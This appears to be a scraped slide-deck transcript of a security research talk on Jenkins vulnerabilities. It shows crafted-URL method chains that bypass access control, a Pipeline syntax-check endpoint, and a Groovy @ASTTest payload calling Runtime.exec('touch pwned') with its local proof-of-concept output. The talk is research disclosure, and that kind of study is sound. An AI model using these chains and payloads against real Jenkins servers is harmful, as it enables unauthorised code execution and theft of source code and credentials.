hacking jenkins!...past deserialization bugs on jenkins •cve-2015-8103 - the first deserialization...
TRANSCRIPT
![Page 1: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/1.jpg)
Hacking Jenkins!Orange Tsai
![Page 2: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/2.jpg)
• Come from Taiwan
• Principal security researcher at DEVCORE
• Speaker at Black Hat US/ASIA, DEFCON, HITB, CODEBLUE…
• CTF player (Captain of HITCON CTF team and member of 217)
• Bounty hunter (Found RCE on Facebook, GitHub, Twitter, Uber…)
Orange Tsai
orange_8361
![Page 3: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/3.jpg)
Outline
• Introduction & architecture
• The vulnerability root cause & how to exploit
1. ACL bypass vulnerability
2. Sandbox escape vulnerability
• Evolution of the exploit
![Page 4: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/4.jpg)
What is JenkinsA famous CI/CD service
![Page 5: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/5.jpg)
What is CI/CDContinuous Integration and Continuous Delivery
![Page 6: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/6.jpg)
Why JenkinsHacker-friendly
![Page 7: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/7.jpg)
JVM ecosystem report 2018
https://snyk.io/blog/jvm-ecosystem-report-2018/
![Page 8: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/8.jpg)
Jenkins for hackers
• Lots of
• source code
• credential / GitHub token
• computer node(Intranet!!!)
![Page 9: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/9.jpg)
![Page 10: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/10.jpg)
![Page 11: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/11.jpg)
![Page 12: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/12.jpg)
![Page 13: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/13.jpg)
Common attack vectors
• Login portal
• Known vulnerabilities
![Page 14: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/14.jpg)
Common attack vectors
• Login portal
• Known vulnerabilities
![Page 15: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/15.jpg)
![Page 16: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/16.jpg)
Common attack vectors
• Login portal
• Known vulnerabilities
![Page 17: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/17.jpg)
Past deserialization bugs on Jenkins
![Page 18: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/18.jpg)
Past deserialization bugs on Jenkins• CVE-2015-8103 - The first deserialization bug
• CVE-2016-0788- Bypass the blacklist by the JRMP gadget
• CVE-2016-0792 - Bypass the blacklist by the XStream
• CVE-2016-9299 - Bypass the blacklist by the LDAP gadget
• CVE-2017-1000353 - Bypass the blacklist by the SignedObject…
![Page 19: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/19.jpg)
Jenkins remoting 2.54
CVE-2015-8103
![Page 20: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/20.jpg)
Jenkins remoting 2.55CVE-2016-0788
![Page 21: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/21.jpg)
Jenkins remoting 3.2CVE-2016-9299
![Page 22: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/22.jpg)
Jenkins remoting 3.28
CVE-2017-1000353
![Page 23: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/23.jpg)
Jenkins is so angry that rewrite all the serialization protocol
into a new HTTP-based protocol
![Page 24: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/24.jpg)
No deserialization anymoreThere is no more pre-auth RCE in Jenkins core since 2017
![Page 25: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/25.jpg)
Discover new one
![Page 26: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/26.jpg)
Reviewing scopes1. Jenkins core
2. Stapler framework
3. Default plugins
![Page 27: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/27.jpg)
CVEs
1. CVE-2018-1000600 - CSRF and missing permission checks in GitHub Plugin
2. CVE-2018-1000861 - Code execution through crafted URLs
3. CVE-2018-1999002 - Arbitrary file read vulnerability
4. CVE-2018-1999046 - Unauthorized users could access agent logs
5. CVE-2019-1003000 - Sandbox Bypass in Script Security and Pipeline Plugins
6. CVE-2019-1003001 - Sandbox Bypass in Script Security and Pipeline Plugins
7. CVE-2019-1003002 - Sandbox Bypass in Script Security and Pipeline Plugins
![Page 28: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/28.jpg)
Review Java web
• Where is the configuration?
• Where is the library?
• Where is the application code?
• Where is the entry point?
ROOT/
├── index.jsp
├── robots.txt
└── WEB-INF
├── classes
│ └── HelloWorld.class
├── lib
│ └── servlet-api.jar
└── web.xml
<servlet><servlet-name>Stapler</servlet-name><servlet-class>org.kohsuke.stapler.Stapler</servlet-class>
</servlet>…<servlet-mapping>
<servlet-name>Stapler</servlet-name><url-pattern>/*</url-pattern>
</servlet-mapping>
Jenkins/war/src/main/webapp/WEB-INF/web.xml
![Page 29: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/29.jpg)
Jenkins dynamic routing
![Page 30: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/30.jpg)
Routing rules
<token>
get<token>()
get<token>(String)
get<token>(Int)
get<token>(Long)
get<token>(StaplerRequest)
getDynamic(String, …)
doDynamic(…)
do<token>(…)
js<token>(…)
@WebMethod annotation
@JavaScriptMethod annotation
![Page 31: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/31.jpg)
Method Chain
jenkins.model.Jenkins.getFoo()
.getBar(1)
.getBaz("orange")
http://jenkins/foo/bar/1/baz/orange
![Page 32: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/32.jpg)
CVE-2018-1000861Code execution through crafted URLs
Routing Access Control List Bypass
Bypass Overall/Read permission
![Page 33: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/33.jpg)
What's wrong with that?Here are two problems
![Page 34: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/34.jpg)
First problemEvery class in Java inherits Object class, except Object itself
![Page 35: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/35.jpg)
jenkins.model.Jenkins.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
http://jenkins/class/classLoader
/resource/index.jsp/content
![Page 36: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/36.jpg)
jenkins.model.Jenkins
.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
1. get<token>()
2. get<token>(String)
3. get<token>(Int)
4. get<token>(Long)
5. get<token>(StaplerRequest)
6. getDynamic(String, …)
7. doDynamic(…)
8. do<token>(…)
9. ……
public final Class<?> getClass()
java.lang.Object
![Page 37: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/37.jpg)
public ClassLoader getClassLoader()
java.lang.Class
1. get<token>()
2. get<token>(String)
3. get<token>(Int)
4. get<token>(Long)
5. get<token>(StaplerRequest)
6. getDynamic(String, …)
7. doDynamic(…)
8. do<token>(…)
9. ……
jenkins.model.Jenkins
.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
![Page 38: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/38.jpg)
public URL getResource(String name)
java.lang.ClassLoader
1. get<token>()
2. get<token>(String)
3. get<token>(Int)
4. get<token>(Long)
5. get<token>(StaplerRequest)
6. getDynamic(String, …)
7. doDynamic(…)
8. do<token>(…)
9. ……
jenkins.model.Jenkins
.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
![Page 39: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/39.jpg)
public final Object getContent()
java.net.URL
1. get<token>()
2. get<token>(String)
3. get<token>(Int)
4. get<token>(Long)
5. get<token>(StaplerRequest)
6. getDynamic(String, …)
7. doDynamic(…)
8. do<token>(…)
9. ……
jenkins.model.Jenkins
.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
![Page 40: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/40.jpg)
Second problemURL prefix whitelist bypass
![Page 41: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/41.jpg)
URL whitelists by default
![Page 42: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/42.jpg)
URL whitelists by default
jenkins.model.Jenkins.doLogout(…)
http://jenkins/logout
![Page 43: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/43.jpg)
jenkins.model.Jenkins
.getSearch()
http://jenkins/search?q=
403 Forbidden
![Page 44: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/44.jpg)
What if there is a whitelisted method returns a Search object?
![Page 45: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/45.jpg)
URL whitelists by default
![Page 46: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/46.jpg)
http://jenkins/securityRealm/
public SecurityRealm getSecurityRealm()
Jenkins.model.Jenkins
jenkins.model.Jenkins
.getSecurityRealm()
![Page 47: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/47.jpg)
http://jenkins/securityRealm/user/[name]/
public User getUser(String id)
Jenkins.model.HudsonPrivateSecurityRealm
jenkins.model.Jenkins
.getSecurityRealm()
.getUser([name])
![Page 48: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/48.jpg)
http://jenkins/securityRealm/user/[name]/search
public Search getSearch()
Jenkins.model.AbstractModelObject
jenkins.model.Jenkins
.getSecurityRealm()
.getUser([name])
.getSearch()
![Page 49: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/49.jpg)
![Page 50: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/50.jpg)
Jenkins checks the permission again before most of dangerous methods
It's sad
![Page 51: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/51.jpg)
http://jenkins/script
![Page 52: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/52.jpg)
Maximize the severityEscalate to a pre-auth information leakage √
Escalate to a pre-auth Server Side Request Forgery √
Escalate to a pre-auth Remote Code Execution ?
![Page 53: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/53.jpg)
Remote Code Execution• CVE-2018-1000861 - Code execution through crafted URLs
• CVE-2019-1003000 - Sandbox Bypass in Script Security Plugins
![Page 54: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/54.jpg)
What is PipelinePipeline is a script to help developers more easier to write scripts
for software building, testing and delivering!
![Page 55: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/55.jpg)
Pipeline is a DSLWhich built with Groovy
![Page 56: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/56.jpg)
Pipeline syntax checkhttp://jenkins/descriptorByName
/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition
/checkScriptCompile?value=[Pipeline here]
![Page 57: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/57.jpg)
If you are the programmerHow do you implement this syntax-error-checking function?
![Page 58: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/58.jpg)
As I said beforePipeline is a DSL built with Groovy
![Page 59: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/59.jpg)
No execute(), only AST parse
![Page 60: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/60.jpg)
Nothing happened :(this.class.classLoader.parseClass('''
java.lang.Runtime.getRuntime().exec("touch pwned")
''');
![Page 61: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/61.jpg)
I failed to exploit beforeBut in this time, Meta-Programming flashed in my mind
![Page 62: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/62.jpg)
Meta-Programming isWrite programs that operate on other programs
• Compiler• Preprocessor• Interpreter• Linker• …
![Page 63: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/63.jpg)
Two type• compile-time
• Run-time
![Page 64: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/64.jpg)
compile-time Meta-Programming
• Operate the program during compiler/parsing time
• C Macro
• C++ Template
• Java Annotation
• DSL
• …$ gcc test.c –c && ls –size -h test.o
2GB test.o
![Page 65: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/65.jpg)
compile-time Meta-Programming
• Operate the program during compiler/parsing time
• C Macro
• C++ Template
• Java Annotation
• DSL
• …
Fibonacci number
![Page 66: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/66.jpg)
compile-time Meta-Programming
• Operate the program during compiler/parsing time
• C Macro
• C++ Template
• Java Annotation
• DSL
• …
![Page 67: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/67.jpg)
Groovy Meta-ProgrammingPipeline is a DSL built with Groovy
![Page 68: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/68.jpg)
Reading…
![Page 69: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/69.jpg)
@ASTTestWhat the hell is that
![Page 70: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/70.jpg)
@ASTTest@ASTTest is a special AST transformation meant to help debugging other AST
transformations or the Groovy compiler itself. It will let the developer “explore”
the AST during compilation and perform assertions on the AST rather than on
the result of compilation. This means that this AST transformations gives
access to the AST before the bytecode is produced. @ASTTest can be placed
on any annotable node and requires two parameters:
![Page 71: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/71.jpg)
@ASTTest@ASTTest(phase=CONVERSION, value={
assert node instanceof ClassNode
assert node.name == 'Person'
})
class Person {}
![Page 72: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/72.jpg)
Let's try that in localthis.class.classLoader.parseClass('''
@groovy.transform.ASTTest(value={
assert java.lang.Runtime.getRuntime().exec("touch pwned")
})
class Person {}
''');
![Page 73: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/73.jpg)
Let's try that in local$ ls
poc.groovy
$ groovy poc.groovy
$ ls
poc.groovy pwned
![Page 74: Hacking Jenkins!...Past deserialization bugs on Jenkins •CVE-2015-8103 - The first deserialization bug •CVE-2016-0788- Bypass the blacklist by the JRMP gadget •CVE-2016-0792-](https://reader033.vdocument.in/reader033/viewer/2022042517/5f4b8026151cf9557e783d47/html5/thumbnails/74.jpg)
